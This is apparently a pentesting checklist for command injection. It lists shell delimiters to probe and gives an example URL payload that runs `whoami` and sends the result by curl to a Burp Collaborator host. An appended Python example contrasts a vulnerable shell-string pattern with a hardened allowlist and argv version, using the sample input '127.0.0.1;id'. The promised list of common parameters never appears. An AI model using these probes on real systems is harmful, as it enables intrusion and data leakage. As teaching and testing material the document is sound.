We can inject some special characters to see if the application blocks anything that could be used for command injection:

- `&`
- `;`
- Newline (`0x0a` or `\n`)
- `&&`
- `|`
- `||`

If the application doesn't throw any error messages, we can try injecting our command after one of these delimiters.
Observe whether the parameter executes the command you inject, e.g.: `http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/`

Note: This is a broad concept; the payload above is just an example.

The most common parameters to consider while testing for command injection are listed below:
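The vulnerable pattern these probes detect, beside its hardened form, as an added example that is not part of the original checklist (the delimiter list is the one given above; `ping` as the wrapped command and the hostname allowlist are assumptions):

```python
import re
import subprocess

# Delimiters from the checklist above. Assumption: a real shell has more
# (backticks, $(), redirects), so this check is a detection aid, not the fix.
SHELL_DELIMITERS = ["&&", "||", "&", ";", "|", "\n"]

# Assumed allowlist for a hostname/IP parameter: letters, digits, dots, dashes.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def find_delimiters(value: str) -> list[str]:
    """Return the checklist delimiters present in an untrusted parameter value."""
    return [d for d in SHELL_DELIMITERS if d in value]


def build_vulnerable_command(host: str) -> str:
    """Vulnerable pattern: untrusted input concatenated into a shell string.

    Code like this typically ends in subprocess.run(cmd, shell=True), so
    everything after ';' or '&&' in `host` is run as a second command.
    """
    return f"ping -c 1 {host}"


def is_safe_host(host: str) -> bool:
    """Allowlist check: reject anything outside the expected hostname charset."""
    return HOSTNAME_RE.fullmatch(host) is not None


def build_safe_command(host: str) -> list[str]:
    """Hardened pattern: validate first, then pass an argv list with no shell.

    With shell=False, a metacharacter that survives validation is handed to
    ping as a literal argument instead of being parsed by /bin/sh.
    """
    if not is_safe_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


def run_safe(host: str) -> subprocess.CompletedProcess:
    """Execute the hardened form; shell=False is the default for a list argv."""
    return subprocess.run(build_safe_command(host), capture_output=True, text=True)


if __name__ == "__main__":
    probe = "127.0.0.1;id"  # constructed sample input mirroring the page's probe
    print("delimiters found:", find_delimiters(probe))
    print("vulnerable string:", build_vulnerable_command(probe))
    print("safe argv accepted:", is_safe_host(probe))
```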